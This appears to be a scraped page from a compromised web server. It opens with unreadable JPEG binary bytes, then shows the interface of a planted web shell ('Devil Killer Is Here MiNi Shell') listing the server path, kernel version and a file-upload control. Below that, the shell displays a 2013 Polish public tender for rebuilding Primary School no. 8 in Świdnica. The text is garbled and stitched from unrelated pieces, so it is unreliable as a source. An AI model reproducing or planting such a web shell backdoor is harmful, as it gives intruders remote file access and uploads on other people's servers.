JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131021/428250-N-2013.html

<p class="kh_header"><b>Świdnica: wykonanie robót budowlanych w ramach zadania pn.:
Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy
- modernizacja obiektów dydaktycznych na terenie powojskowym - etap I</b><br>
<b>Numer ogłoszenia: 428250 - 2013; data zamieszczenia: 21.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych w ramach zadania pn.:
Przebudowa Szkoły Podstawowej nr 8 przy ul. Wałbrzyskiej 39 w Świdnicy
- modernizacja obiektów dydaktycznych na terenie powojskowym - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje roboty budowlane polegające na przebudowie budynku B Szkoły Podstawowej nr 8 przy ulicy Wałbrzyskiej 39 w Świdnicy położonego na działce nr 1996, AM11, Obr. 0005 Zachód oraz zagospodarowanie terenu wokół budynku B szkoły wraz z wpięciem kanalizacji deszczowej do sieci przebiegającej wzdłuż ulicy Paderewskiego obejmujące częściowo działki 1991, 1993, 1994, 1996 AM11, Obr. 0005 Zachód. 
Dane techniczno-użytkowe obiektu:
Rodzaj zabudowy: budynek wolno stojący
Powierzchnia zabudowy: 1123,20 m2
Powierzchnia użytkowa: 1533,68 m2
Powierzchnia strychu: 448,00 m2
Kubatura: 10561,7 m3
Liczba kondygnacji nadziemnych: 1+ poddasze
Podpiwniczenie: obiekt częściowo podpiwniczony
Rodzaj dachu: dach stromy wielospadowy wykonany w tradycyjnej konstrukcji drewnianej
Pokrycie dachu: dachówka ceramiczna karpiówka układana w łuskę

Zakres przedmiotu zamówienia obejmuje w szczególności:
A. Roboty Budowlane:
-Roboty rozbiórkowe i demontażowe;
-Przebudowa strefy wejściowej do budynku B wraz ze schodami zewnętrznymi i pochylnią dla osób niepełnosprawnych, wykonanie fundamentów strefy wejściowej wraz ze wzmocnieniem wieńców żelbetowych;
-Wykonanie studzienek piwnicznych S1 i S2 - łącznie w ilości 7 szt.;
-Wymurowanie ścian wewnętrznych, ścian fundamentowych i ścianek działowych wynikające z częściowej zmiany układu funkcjonalnego pomieszczeń związanej z dostosowaniem budynku B szkoły do obowiązujących przepisów p.poż;
-Zamurowania, przymurowania, i wykonanie nadproży w miejscach powiększania istniejących oraz nowoprojektowanych otworów okiennych i drzwiowych;
-Wykonanie elementów stalowych konstrukcji wsporczych dla centrali wentylacyjnych;
-Docieplenie, uzupełnienie i naprawa uszkodzonych powierzchni stropów międzykondygnacyjnych;
-Naprawa, wzmocnienie, impregnacja drewnianych elementów konstrukcyjnych więźby dachowej, wykonanie poziomych rusztów z brustów drewnianych, termoizolacja krokwi dachowych;
-Docieplenie stropodachu łącznika sali gimnastycznej i wykonanie nowego pokrycia;
-Lokalna rozbiórka pokrycia dachowego w miejscach montażu wyłazów dachowych z niezbędną wymianą elementów konstrukcyjnych więźby dachowej, demontaż kratek wentylacyjnych i zamurowanie otworów wlotowych, oczyszczenie powierzchni kominów powyżej połaci dachu, uzupełnienie pokrycia dachowego        w miejscach uprzedniej rozbiórki z użyciem nowej dachówki ceramicznej karpiówki, montaż systemowych elementów komunikacyjnych w obrębie połaci dachowych - wyłazy dachowe, ławy i stopnie kominiarskie;
-Izolacja przeciwwilgociowa pionowa i pozioma wraz z zabezpieczenie przeciwwilgociowym murów wewnętrznych i zewnętrznych piwnic budynku B wraz z sala gimnastyczną poprzez wykonanie przepony poziomej przeciwwilgociowej metodą iniekcji oraz natrysku wraz z przygotowaniem powierzchni ścian do dalszej renowacji;
-Izolacja przeciwwilgociowa pozioma: podstawy studni piwnicznych, styku ław i ścian fundamentowych, projektowanych ław fundamentowych, posadzki na gruncie, schodów zewnętrznych, posadzki węzłów sanitarnych;
-Izolacja pionowa: projektowanych ław i ścian fundamentowych, istniejących ścian fundamentowych, wewnętrznych powierzchni ścian w obrębie kabiny natryskowej, uszczelnienie styków ścian studzienek piwnicznych ze ścianami fundamentowymi budynku;
-Paraizolacja: dachu; stropów drewnianych, ścianek szkieletowych;
-Izolacja cieplna: połaci dachowych, stropu nad poddaszem, stropu pomieszczeń strychowych, stropodachu łącznika do sali gimnastycznej;
-Izolacja pozioma pomieszczeń parteru i pomieszczeń strychowych - w technologii BSO z użyciem wełny mineralnej i stropodachu łącznika do sali gimnastycznej styropapą;
-Okładziny zewnętrzne m.in.: odtworzenie detalu układu graficznego elementów drewnianych muru pruskiego, uzupełnienie okładzin z piaskowca w strefie cokołowej, wymiana istniejącego deskowania ścian szczytowych sali gimnastycznej budynku B, schodów zewnętrznych w strefie wejściowej budynku B, nawierzchni pochylni w strefie wejściowej budynku B; odtworzenie, wymiana, naprawa elementów drewnianych muru pruskiego; 
-Kompleksowy remont elewacji budynku B wraz z sala gimnastyczną zgodnie z dokumentacja projektową
-Okładziny i wykładziny wewnętrzne posadzkowe: w pomieszczeniach higieniczno-sanitarnych,w pomieszczeniach dydaktycznych sal lekcyjnych, w pomieszczeniach dydaktycznych oddziałów przedszkolnych; podłoga na strychu;
- Okładziny wewnętrzne ścienne i sufitowe, powłoki malarskie (zewnętrzne i wewnętrzne);
- Wymiana istniejącej stolarki okiennej, drzwi zewnętrznych i częściowo drzwi wewnętrzne;
- Wymiana wszystkich okien w pomieszczeniach piwnicy budynku B przez które przechodzi instalacja gazowa (pomieszczenie 0.3, 0.4, 0.16) w ilości 3 sztuk na okna drewniane białe z nawietrzakiem o wymiarach okna O35 (wymiary zgodnie z zestawieniem stolarki okiennej rys. A-20/B - dokumentacja techniczna opisana w pkt.3.4.SIWZ)
-Pomieszczenie 0.16 w piwnicy budynku B: wyburzenie ścianki H=0,70 wraz ze skuciem posadzki i wykonaniem nowej posadzki cementowej zatartej na gładko;
-Wymiana i montaż obróbek blacharskich (rynny i rury spustowe), podokienników zewnętrznych, podokienników wewnętrzny, balustrad schodowych i balustrad ochronnych;
-Montaż krat pomostowych dla studzienek piwnicznych i kraty zabezpieczającej wewnętrzną klatkę techniczną w budynku B;
B.Roboty Instalacyjne:
-Wentylacja mechaniczna pomieszczeń piwnicznych w budynku B wraz z montażem centrali wentylacyjnej;
-Wentylacja kondygnacji nadziemnych budynku B (wentylacja mechaniczno - nawiewna z rekuperacją);
-Wewnętrzna instalacja hydrantowa: wymiana szafek hydrantowych, uzupełnienie instalacji hydrantowej;
-Instalacja wodno-kanalizacyjna: nowy układ przygotowania ciepłej wody użytkowej wraz z wymianą wymienników ciepłej wody typu JAD w ilości 2 sztuki wraz z zasobnikiem c.w.u. o bezwężownicowy(o pojemności zasobnika c.w.u. - 280 dm3, ciśnieniu dop. - 6 bar, temp. dop. - 80°C) - 1 szt. z niezbędną armaturą i pompą cyrkulacyjną w całości w zakresie pomieszczenia kotłowni wraz z wyprowadzeniem instalacji przez przegrody oraz z izolacjami poza pomieszczenie kotłowni wraz z uzupełnieniem w pomieszczeniu kotłowni tynków, płyt GK i wszystkich ubytków po wykonywanych pracach także w obrysie zabudów, szachów instalacyjnych wraz z wykonaniem zabezpieczeń p.poż. wszystkich wykonywanych przejść w wymaganych klasach uwzględniając, że kotłownia gazowa stanowi odrębną strefę pożarową  i zabezpieczenie powinno odpowiadać odporności ogniowej tj. ściany zewnętrzne -EI 30, ściany wewnętrzne -EI 120, strop nad kotłownią - EI 60, przepusty rurowe dla rur niepalnych w ścianach wewnętrznych kotłowni zabezpieczone elastyczną masą uszczelniającą CP601S oraz otuliną z wełny mineralnej gr.50mm i gęstości 80-100kg/m3, a przejścia kablowe masą ognioochronną CP656, zapewniając szczelność i izolacyjność ogniową EI 60 dla przegród budowlanych wydzielających kotłownię (wszelkie przekucia oraz demontaże w tym  bruzdy dla wymienianego sprzętu oraz robót w zakresie kotłowni należy naprawić oraz pomalować dobierając kolorystykę oraz materiał do istniejącego);lokalna ingerencja w instalacje wod.-kan w obrębie piwnicy, parteru i poddasza wraz z niezbędnym armaturą zgodnie z dokumentacja techniczną opisaną w pkt.3.4.
-Kanalizacja sanitarna - lokalna przebudowa zgodnie z dokumentacją projektową;
-Kanalizacja deszczowa - przebudowa z odprowadzeniem wód deszczowych do kolektora wraz z wymianą istniejących podejść odpływowych, odwodnienie studzienek piwnicznych, wykonanie drenażu opaskowego wokół budynku B z podłączeniem do nowoprojektowanej wewnętrznej kanalizacji deszczowej, wykonanie przykanalików deszczowych kd160 podejść odpływowych pod istniejące rury spustowe z dachu, czyszczenie wpustów i studzienek wraz z konieczną regulację armatury zabudowanej na kanałach deszczowych i odtworzenie nawierzchni;
-Ogrzewanie i klimatyzacja: wymiana w całości istniejącej instalacji centralnego ogrzewania wraz z grzejnikami, na nową instalację z rur miedzianych i stalowych wraz z armaturą, konwekcyjnymi grzejnikami stalowymi płytowymi zabezpieczonymi osłonami grzejnikowymi; zakres instalacji c.o. obejmuje ponadto odcinek instalacji c.o. złączenia instalacji z kotła gazowego od sprzęgła hydraulicznego                   do nowoprojektowanych rozdzielaczy w obrębie pomieszczenia kotłowni w piwnicy;
C. Roboty elektryczne:
-Wykonanie instalacji elektrycznej:zewnętrznej oraz wewnętrznej instalacji oświetlenia, gniazd wtykowych i instalacji wyrównawczej, zasilanie urządzeń, montaż osprzętu instalacyjnego i gniazd wtykowych;
-Wykonanie instalacji dzwonka szkolnego z podłączeniem do sterownika elektronicznej woźnej;
-Wykonanie instalacji  uziemienia i montaż instalacji odgromowej, wymiana uziomu otokowego wokół budynków, podłączenie metalowych elementów urządzeń zamontowanych na dachach budynków do instal. odgromowej;
-Wykonanie systemu sygnalizacji pożaru wraz z montażem osprzętu i urządzeń;
-Wykonanie instalacji oddymiania klatek schodowych.
D.Zagospodarowanie terenu i infrastruktura techniczna:
-Przebudowa strefy wejściowej do budynku B wraz ze schodami zewnętrznymi i pochylnią dla osób niepełnosprawnych;
-Wykonanie nowych nawierzchni utwardzonych z kostki betonowej w obrębie opaski wokół budynku B;
-Wymiana istniejącego krawężnika drogi wewnętrznej zlokalizowanej wzdłuż elewacji zachodniej budynku B na nowy krawężnik betonowy typu ulicznego;
-Budowa drenażu odwadniającego wokół budynku B z podłączeniem do projektowanej wewnętrznej kanalizacji deszczowej na odcinkach od studni S13,S14,S22,S32,S35 z pięcioma wpustami drogowymi i odwodnieniem liniowym wraz z włączeniem do sieci kd 315 przebiegającej w ulicy Paderewskiego poprzez nowoprojektowane, betonowe studnie połączeniowe DN 1000 zbudowane na istniejącym kolektorze;
-Wymiana istniejących podejść odpływowych kanalizacji deszczowej z rur spustowych PCV na nowe podejścia odpływowe żeliwne z czyszczakami żeliwnymi wokół budynku B i na odcinkach od studni S13,S14,S22,S32,S35.
E. Roboty towarzyszące:  
-Opracowanie planu bezpieczeństwa i ochrony zdrowia BIOZ,
-Zabezpieczenie terenu budowy poprzez ogrodzenie w sposób trwały i zabezpieczenie przed dostępem osób trzecich na teren budowy. Do ogrodzenia należy użyć, np.: segmentowego ogrodzenia stalowego, ogrodzenia z blachy trapezowej na słupkach stalowych lub pełnego ogrodzenia z desek;
-Opracowanie uzgodnionego planu organizacji budowy uwzględniając: zapewnienia dojazdu do placu budowy bramą wjazdową od strony ulicy S. Moniuszki poprzez drogę przy miasteczku ruchu drogowego wraz z niezbędną korektą istniejących drzew; a w przypadku braku możliwości wjazdu ciężkim sprzętem budowlanym dla w/w drogi uwzględniając możliwość wjazdu od ulicy Paderewskiego tylko po godz.16:30;
-Organizacja, utrzymanie i likwidacja placu budowy;
-Usuwanie odpadów i zanieczyszczeń z terenu budowy wraz z ich utylizacją;
- Realizacja nadzoru i kierownictwa prac montażowych przez osoby wykwalifikowane..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art.67 ust.1 pkt.6 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013r. poz. 907, z póź. zm.) przewiduje  możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.10-5, 45.26.27.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1, 45.11.12.91-4, 45.23.32.22-1, 45.45.30.00-7, 45.26.25.12-3, 45.42.10.00-4, 45.44.30.00-4, 45.31.00.00-3, 45.33.00.00-9, 45.33.12.10-1, 45.34.30.00-3, 45.10.00.00-8, 45.50.00.00-2, 45.11.12.00-0, 45.11.12.20-6, 45.11.12.40-2, 45.11.13.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 45.000,00 zł (słownie: czterdzieści pięć tysięcy złotych i 00/100).
Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. do dnia 07.11.2013r. przed godz. 09.00.
2.Wadium może być wniesione w formach określonych w art.45 ust.6</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,
  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, 
  co najmniej dwa zamówienia polegające na budowie lub przebudowie budynków użyteczności publicznej lub budynków mieszkalnych (z wyłączeniem budynków produkcyjnych i handlowych) o kubaturze                        nie mniejszej niż 10 000 m3 w zakresie robót budowlanych i instalacyjnych z czego co najmniej jedno z zamówień o wartości nie mniejszej niż 3.000.000,00 zł netto (przez określenie wartości robót zamówienia należy rozumieć łączną wartość robót w zakresie robót budowlanych i instalacyjnych).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli dysponuje osobami zdolnymi do wykonania niniejszego zamówienia posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalnościach:
-   konstrukcyjno-budowlanej: osoba pełniąca funkcję kierownika budowy;
- instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych,  wentylacyjnych i gazowych: osoba pełniąca funkcję kierownika robót branży instalacji sanitarnych;
-  instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych: osoba pełniąca funkcję kierownika robót branży instalacji elektrycznych;
wymaganych ustawą Prawo Budowlane (t.j. Dz. U. z 2010r. nr 243, poz. 1623, z póz. zm. art.14.1.2  i 14.1.4.), a w przypadku uprawnień uzyskanych przed wejściem w życie ww. ustawy należy powołać się na inne aktualnie obowiązujące przepisy.

Wskazane powyżej osoby powinny przynależeć do właściwej izby samorządu zawodowego odpowiednio do charakteru nadzorowanych robót oraz powinny posiadać minimum 3 letnie doświadczenie przy realizacjach tożsamych z przedmiotem zamówienia, a w szczególności osoba wskazana do pełnienia funkcji kierownika budowy powinna posiadać doświadczenie w kierowaniu minimum 2 budowami dotyczącymi budowy lub przebudowy budynków użyteczności publicznej lub budynków mieszkalnych (z wyłączeniem budynków produkcyjnych i handlowych) o kubaturze nie mniejszej niż 10 000 m3.
Uwaga: Zamawiający dopuszcza łączenie funkcji przez jedną osobę pod warunkiem, że osoba ta spełnia wymagania określone dla poszczególnych specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 2 mln. PLN (słownie: dwa miliony złotych) oraz wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej                w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia                                   nie mniejszą jak: 1 mln. PLN (słownie: jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,
  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością, 
  co najmniej dwa zamówienia polegające na budowie lub przebudowie budynków użyteczności publicznej lub budynków mieszkalnych (z wyłączeniem budynków produkcyjnych i handlowych) o kubaturze nie mniejszej niż 10 000 m3 w zakresie robót budowlanych i instalacyjnych z czego co najmniej jedno z zamówień o wartości nie mniejszej niż 3.000.000,00 zł netto (przez określenie wartości robót zamówienia należy rozumieć łączną wartość robót w zakresie robót budowlanych i instalacyjnych).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w Art. 22 ust. 1 pkt. 4 ustawy Pzp polega na zdolnościach finansowych innych podmiotów winien przedłożyć informację banku                   lub spółdzielczej kasy oszczędnościowo-kredytowej, o której mowa w rozdz.7/ pkt.1 lit.d specyfikacji dotyczącej tych podmiotów. 
Jeżeli Wykonawca będzie polegał na zdolnościach ekonomiczno-finansowych podmiotów trzecich, do oferty należy dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.)
Polisa lub inny dokument ubezpieczenia, o której mowa w rozdz.7/ pkt.1 lit.d specyfikacji, może być wystawiona łącznie dla wszystkich Wykonawców. 
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który                     w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

